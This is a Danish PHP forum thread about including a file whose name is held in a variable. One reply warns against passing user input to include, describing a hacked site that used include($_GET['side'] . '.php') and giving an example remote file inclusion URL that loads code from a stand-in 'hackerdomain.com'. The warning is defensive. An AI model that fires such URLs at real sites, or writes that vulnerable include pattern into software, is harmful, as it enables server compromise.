CIO Premium Job & Karriere Eksperten IT-Kurser Events Podcast Søg
Cookie ikon
danic Nybegynder
30. januar 2010 - 09:39 Der er 5 kommentarer og
1 løsning

Kan man include en variable?

Kan man include en variable?

F.eks.
<?php include('$frontpage_info'); ?>

Eller hvad gør man så?
intenz Novice
30. januar 2010 - 09:47 #1
Det kan du sagtens.
<?php
$minfil = "fil.php";
include($minfil);
?>
danic Nybegynder
30. januar 2010 - 09:55 #2
Ah..

Fejlen var: <?php include('$frontpage_info'); ?>
skulle være: <?php include($frontpage_info); ?>
intenz Novice
30. januar 2010 - 10:13 #3
Ja, når du bruger en variabel i en funktion, skal den altid indsættes uden '' omkring sig. Den slags er kun til tekst-strenge.
phliplip Nybegynder
30. januar 2010 - 11:21 #4
HUSK HUSK HUSK!

ALDRIG at bruge nogen form for bruger input - $_GET/$_POST/$_REQUEST/$_COOKIE etc i dine include/require.
Især hvis fopen_wrappers er enabled.

Jeg overtog på et tidspunkt en hjemmeside, hvor der pludselig begyndte at ligge ukendte mapper og filer på serveren.

Det viste sig at navigationen på siden var baseret på noget i stil med

include($_GET['side'] . '.php');

Så kan du forestille dig hvad der sker hvis man skriver

http://mitdomain.dk/index.php?side=http://hackerdomain.com/skadeligkode.php?a=

og skadeligkode.txt indeholder (i dette tilfælde uskadelig kode)

<?php phpinfo(); ?>
majbom Novice
30. januar 2010 - 20:11 #5
-> #4 - smart ;)
phliplip Nybegynder
31. januar 2010 - 05:10 #6
Ja det tog også lidt tid før jeg opdagede hvor det lå begravet.
Det var kun fordi jeg brugte flere timer i access-log'en at jeg fandt ud af det!

Det mest indlysende er jo at skifte FTP pass osv.
Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Opret Preview

Flere spørgsmål fra PHP kategorien

Titel Indlæg Oprettet Seneste aktivitet
SQL Group by men mangle nogle values Af Morten i PHP 1 I går 18:31 I går 19:01
Foreach og array med 2 forkerte resultater og to rigtige, dette er det samme produkt Af Morten i PHP 8 I går 07:52 I går 18:24
Kald af sms på mobiltelefon Af tvilling53 i PHP 4 09/04/202114:56 09/04/202117:16
hmm min loop bliver ved i en uendlighed min xml fil bliver skrevet om igen og igen Af Morten i PHP 13 08/04/202113:20 09/04/202106:42
Duplicated content "Group by og distinct" Virker ikke på min kode Af Morten i PHP 2 07/04/202106:40 07/04/202113:07
Se alle spørgsmål i kategorien Opret spørgsmål

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Opret Log ind

Du kan også logge ind via nedenstående tjenester



Alle kategorier på Eksperten
Seneste spørgsmål Seneste aktivitet
I går 20:34 Service Pack 3 kan ikke installeres. Af Marleymops i Windows
I går 20:34 Excel VBA macro Af Hulubulu i Excel
I går 20:18 udskiftning af grafikkort Af Dragonqueen i PC
I går 19:51 Kazoom 1000/1000 med asus RT-AC88U Af Dennis i Routere & Switches
I går 19:32 PC Benchmark Hvor? Af kfec i Andet software
White papers
Flere white papers »


Premium
Microsoft bekræfter gigant-opkøb af AI-selskabet Nuance
Nuance Communication, der blandt andet har leveret teknologi til Apples Siri, er blevet opkøbt af Microsoft, der mandag eftermiddag bekræfter handlen.
Læs mere »
Antal af frygtede dekrypterings-angreb mod Danmark firedoblet på et år
Scales satser på rekordår og indleder rekrutteringsoffensiv: Skal finde op mod 60 nye medarbejdere
Danske Penni.io får 42 millioner kroner i kapitalindsprøjtning
Se alle »
Computerworld
Gigantisk datalæk: 600.000 danskeres Facebook-data offentliggjort på hackerforum
Data om 533 millioner Facebook-brugere på verdensplan er i weekenden blev lækket på hackerforum.
Læs mere »
Sikkerhedshul i sundhed.dk gør det let at snyde med coronapas
Drop dine 'guesstimates' og SPT-analyser (slag-på-tasken): Sådan får du dit WiFi til at spille
Sundhed.dk er klar med vaccinepas: Sådan finder du det
Se alle »
CIO
Har du rost din mellemleder i dag? Snart er de uddøde - og det er et tab
Computerworld mener: Mellemledere lever livet farligt: Topledelsen får konstant ideer med skiftende hold i virkeligheden, og moden går mod flade agile organisationer. Men mellemlederen er en overset hverdagens helt med et kæmpe ansvar. Her er min hyldest til den ofte latterliggjorte mellemleder.
Læs mere »
Der findes ikke noget vigtigere for din virksomhedskultur end psychological safety
Se alle »
Job & Karriere
"Vi var nødt til at sige til dem, at I er nødt til at sende ham hjem nu, for han begynder at knække"
"Vi var nødt til at sige til dem, at I er nødt til at sende ham hjem nu, for han begynder at knække"
Læs mere »
Eva Berneke stopper som topchef i KMD og flytter til Paris: Her er KMD's nye topchef
Kom med bag metaldøren til nyt cyber-forsvarscenter i Søborg: ”Vi overvåger jo alt data"
Lønfest på Østerbro: Hos denne BI-virksomhed spenderes over 2.000.000 kroner per ansat
Se alle »
White paper
Overser du muligheder for at optimere din Dynamics-investering?
Der er omfattende og ofte oversete muligheder for at understøtte centrale forretningsprocesser med Dynamics 365 Finance & Operations.
Læs mere »
17 punkter med plads til forbedring: Sådan øger du din lønsomhed
Overvåg kritiske industrielle systemer og beskyt dem mod angreb
Sådan prioriterer IT-sikkerhedschefernes indsatsen i 2021
Se alle »